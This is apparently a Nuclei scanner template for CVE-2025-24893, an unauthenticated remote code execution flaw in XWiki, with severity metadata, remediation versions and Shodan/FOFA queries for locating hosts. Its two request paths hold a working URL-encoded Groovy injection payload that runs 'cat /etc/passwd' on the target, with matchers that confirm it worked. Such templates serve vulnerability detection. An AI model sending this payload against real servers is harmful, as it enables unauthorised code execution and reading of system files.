id: CVE-2025-24893 info: name: XWiki Platform - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity, and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 15.10.11, 16.4.1, and 16.5.0RC1. impact: | An attacker can execute arbitrary code on the server, leading to a complete compromise of the XWiki instance. remediation: | Upgrade to XWiki 15.10.11, 16.4.1, or 16.5.0RC1 to mitigate this vulnerability. reference: - https://github.com/advisories/GHSA-rr6p-3pfg-562j - https://nvd.nist.gov/vuln/detail/CVE-2025-24893 classification: epss-score: 0.93701 epss-percentile: 0.99857 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-24893 cwe-id: CWE-95 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2025,xwiki,rce,vkev,vuln,kev http: - method: GET path: - "{{BaseURL}}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20" - "{{BaseURL}}/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20" stop-at-first-match: true skip-variables-check: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" - "wiki" condition: and - type: word part: content_type words: - "application/rss+xml" - type: status status: - 200 # digest: 490a00463044022062cc0e852ee5718564ca9bbe3670496c4a5087e20ef9c88885b66b28e2d68d4402205abb50e9e6b22084f43d74a8460bb6db4c5609b70a3d9c55687e85cda2e77a99:922c64590222798bb761d5b6d8e72950